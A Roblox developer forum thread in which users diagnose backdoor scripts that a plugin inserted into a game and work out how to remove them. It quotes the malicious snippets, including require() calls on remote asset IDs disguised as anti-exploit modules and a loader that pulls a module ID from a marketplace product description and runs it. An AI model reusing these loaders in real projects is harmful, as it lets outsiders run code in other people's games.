Help with hacks that are inserted in a game

Hey! So I’m working on a game, and the place’s owner is @Plethoa and somehow a plugin they’ve installed has inserted thousands of scripts that were hacks. So I used my backdoor scanner, and it detected loads of hacks that were inserting modules that claimed to be “anti exploit”.
But, there is an option to remove the scripts, but it would also delete vital scripts.
So I tried to put something in command bar that would find the hacks, and put them in a folder so I could double check they were hacks then delete them, but nothing went into the folder.
This is what I put in command bar:

for _,v in pairs(game.Workspace:GetDescendants())do
	if v:IsA("Script") and v.Name == ""then
		v.Parent = game.ServerStorage.UnderReview
	end
end

This is the code that’s in loads of the models, and parts:

ocal mymodule2 = require(3667797501)
mymodule2.antiexploit()

wait(2) 

local mymodule = require(3664252382)
mymodule.antibackdoor()

Check for scripts that contain “require”, and delete them, though i’am not sure if there are “vital” scripts that contain “require” and aren’t from this backdoor.

And also, that id leaded me to this: [ Content Deleted ] - Roblox

Due to me having BTRoblox, i have access to thing such as script’s source, and this is one of them:

image1237×65 4.57 KB

image1225×394 17.9 KB

And it is obviously obfuscated.

Also, can’t you return to an version of the game where it didn’t had that malicious script inserted?

No, it was there from the start/.

All of this leaded me to this group, and this guy: smartTech - Roblox and @wind_o.

Here is something that was required from the required malicious module: https://www.roblox.com/library/862849844/ld

there is a technical to delete them when you do not have access to the file, but I forget them, I advise you to search on the form or to create a new game without the plugin

I already saw this group yesterday, in fact I found a backdoor in other plugin created by this group to

https://devforum.roblox.com/t/je-crois-avoir-trouver-une-backdoor-dans-un-plugin-avec-plus-de-70-000-ventes/631941

I just need a answer, what is the name of the backdoor plugin? I would more likely want an link of it.

100% is a backdoor

image1083×618 37.2 KB

No doubt.

Edit: What? I just said that there is no doubt about it being a backdoor, if you thought that google translate spelt it wrong, no, it spelt correctly

Google translate baddddd x’)
30 characterrrrrrrrrrrrr

Not a back door. This inserts my CheckMeIn system. It’s obfuscated to prevent piracy. You can deobfuscate and you will find the source is legitimate.

Why is there multiple scripts inserting this?

This is what I get for hastily replying without reading the entire thread.

This looks like a fork of my system, part of it inserts the real deal and the other part requires some shady module (which is the back door)

obfuscated with Synapse system…I don’t think it makes sense

It’s obfusucated for a reason.
Also I just found what was causing the thing. I found a script that was using loads of shady practices, and it had market place service in. The name also looked like a hack. This is the code:

marketplaceService = game:GetService('MarketplaceService') productInfo = marketplaceService:GetProductInfo(2655062037) modulefunc = productInfo.Description modulefunc = tonumber(string.match(modulefunc, '%d+')) require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)

It was repetitively asking you to buy something, which is why I made this post.

SmartTech CheckMeIn Pirated prompts a purchase, The OP might have used a pirated version of CMI.